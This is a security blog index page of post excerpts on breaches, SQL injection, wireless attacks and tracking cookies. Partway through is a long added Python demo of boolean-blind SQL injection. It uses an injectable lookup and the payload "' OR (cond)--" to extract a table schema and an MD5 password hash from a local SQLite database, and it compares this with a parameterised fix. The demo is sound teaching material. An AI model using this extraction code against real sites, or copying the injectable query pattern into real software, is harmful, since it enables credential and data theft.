By Jake Reynolds (Depth Security)
Expose unnecessary ports via NAT and firewall rules to your DMZ. I’m talking SSH, telnet, HTTP/S, SNMP, MS-SQL, MySQL, YourSQL, NetBIOS…. everything. If you’re really serious about getting compromised, NAT public addresses to your internal Active Directory servers and database. If you don’t have a firewall or a DMZ, all the better. Make sure no effective...
SQL injection used to be a lot easier a few years ago when it was less known, web application security was less mature, and errors were often exposed. It’s very easy to use a variety of methods to cause errors to display database names, table names, column names, and even row values… when errors are...
Barracuda Networks is the latest on the list of security vendors/service providers to be compromised. The Malaysian group “HMSec” used blind SQL injection to retrieve database contents including emails, CMS logins, and MD5-hashed passwords. A post on barracudalabs.com titled “Learning the Importance of WAF Technology – the Hard Way” explains that, “The Barracuda Web Application Firewall in front of the Barracuda...
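The extraction technique behind the two posts above (schema and row values pulled out through an injectable query) is worth seeing end to end, so here is an added example that is not part of the original posts or any Depth Security code. It uses a boolean-based blind oracle of the kind HMSec is described as using, rather than the error-message disclosure the earlier post discusses, because a blind oracle is the weaker signal and still recovers everything. The SQLite-backed lookup function, the `users` table, the address `admin@example.com`, the password `hunter2` and every function name are constructed for the demo and are not from the Barracuda incident.

```python
import hashlib
import sqlite3

# Constructed sample data for the demo (hypothetical; not from any real breach).
TARGET_MD5 = hashlib.md5(b"hunter2").hexdigest()


def build_db():
    """In-memory SQLite database standing in for the vulnerable site's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, pw_md5 TEXT)")
    conn.execute(
        "INSERT INTO users (email, pw_md5) VALUES (?, ?)",
        ("admin@example.com", TARGET_MD5),
    )
    conn.commit()
    return conn


def vulnerable_lookup(conn, email):
    """Deliberately injectable: the parameter is concatenated into the query.

    Only a yes/no answer leaks (row found or not), which is all a blind
    attacker needs. Errors are swallowed to keep the oracle strictly boolean.
    """
    sql = f"SELECT id FROM users WHERE email = '{email}'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def safe_lookup(conn, email):
    """Hardened version: a bound parameter is never parsed as SQL."""
    row = conn.execute("SELECT id FROM users WHERE email = ?", (email,)).fetchone()
    return row is not None


def make_oracle(lookup, conn):
    """Turn a lookup function into a boolean oracle over an arbitrary SQL condition.

    The payload closes the string literal, ORs in the attacker's condition and
    comments out the trailing quote:  ... WHERE email = '' OR (<cond>)--'
    """
    return lambda cond: lookup(conn, f"' OR ({cond})--")


def blind_int(oracle, expr, lo, hi):
    """Binary-search the integer value of SQL expression `expr` within [lo, hi]
    using only "is expr > mid?" questions (about log2(hi - lo) oracle calls).
    A NULL expression never satisfies ">" and therefore resolves to `lo`."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_string(oracle, expr, maxlen=256):
    """Recover the text value of `expr` one character at a time.

    Characters are assumed to be ASCII (code points 0-127); widen the range for
    other data. length(), substr() and unicode() are SQLite built-ins. Values
    longer than `maxlen` are truncated to `maxlen` characters.
    """
    length = blind_int(oracle, f"length(({expr}))", 0, maxlen)
    chars = [
        chr(blind_int(oracle, f"unicode(substr(({expr}), {i}, 1))", 0, 127))
        for i in range(1, length + 1)
    ]
    return "".join(chars)


def run_demo():
    """Enumerate the schema, pull the stored hash, then retry against the fixed code."""
    conn = build_db()
    vuln = make_oracle(vulnerable_lookup, conn)
    safe = make_oracle(safe_lookup, conn)

    table = blind_string(
        vuln, "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1"
    )
    # The CREATE statement carries the column names, so no guessing is needed.
    schema = blind_string(vuln, f"SELECT sql FROM sqlite_master WHERE name='{table}'")
    leaked_hash = blind_string(vuln, "SELECT pw_md5 FROM users WHERE id = 1")
    after_fix = blind_string(safe, "SELECT pw_md5 FROM users WHERE id = 1")
    return {"table": table, "schema": schema, "hash": leaked_hash, "after_fix": after_fix}


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

Against the concatenating lookup the oracle gives up the table name, the full CREATE statement and the 32-character MD5 in a few hundred requests; against the parameterised lookup the same payload is just a nonexistent e-mail address, every question answers "no", and the extraction returns an empty string. The MD5 that comes out is then an offline cracking problem, which is why storing unsalted MD5 was the second failure in the Barracuda case, not just the injection.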
RSA has announced that they have been compromised by an “extremely sophisticated cyber attack” of which details are not clear. All that is known is that RSA’s two-factor authentication seems to be affected. The degree to which this breach impacts their two-factor authentication solutions is not known and RSA has filed an 8-K with the SEC so don’t expect...
HBGary Federal CEO Aaron Barr decided to unmask who he thought was behind the leadership of attacks against MasterCard, Visa, and other perceived enemies of WikiLeaks. Before unmasking this individual, Barr spilled the beans and communicated his intended actions to this person. A custom-written CMS application (http://www.hbgaryfederal.com) suffered from SQL injection, SQL injection in a URL...
Although this doesn’t prove anything that hasn’t already been proven, seeing often cements belief much more effectively than reading. In this video, I gain access to three separate wireless networks using three separate authentication and encryption schemes. Test Networks – The Victims: ClientCorporate (802.1x/PEAP), ClientVendor (WPA2-PSK/AES), ClientGuest (WEP-128 PSK). Full Disclosure – This video is...
Fierce is one of the best DNS enumeration tools I’ve ever used. It’s great for DNS servers that do not allow anonymous zone transfers, as it includes dictionary-based hostname enumeration. A Perl script that enumerates an HTTPS instance’s supported SSL versions and ciphers. The best Firefox extension, hands down, for manual web application security assessments....
Collin Mulliner and Nico Golde gave a very interesting SMS DoS presentation at the 27th Chaos Communication Congress. The gist of it is that “feature phones” (cheaper, less feature-rich phones sold by providers, as opposed to “smart phones”) can accept and execute certain binary payloads delivered in incoming SMS text messages. Networks often use this functionality to roll...
Can you possibly defend the statement that 802.1x with PEAP or EAP-TTLS can be worse than open wireless with no authentication or encryption? Remember the old Cisco LEAP implementation that was vulnerable to offline brute-force attacks due to sending users’ MS-CHAPv2 challenge/response outside of a secure connection? Joshua Wright has documented this in detail and even...
As if HTTP cookies, Local Shared Objects (Flash cookies), and web developers’ understanding of them weren’t a big enough security issue, Samy Kamkar has written a JavaScript API for “virtually irrevocable persistent cookies.” Want to keep track of users even after they remove their cookies, switch browsers, clear cache, or whatever? No problem, just throw a reference to...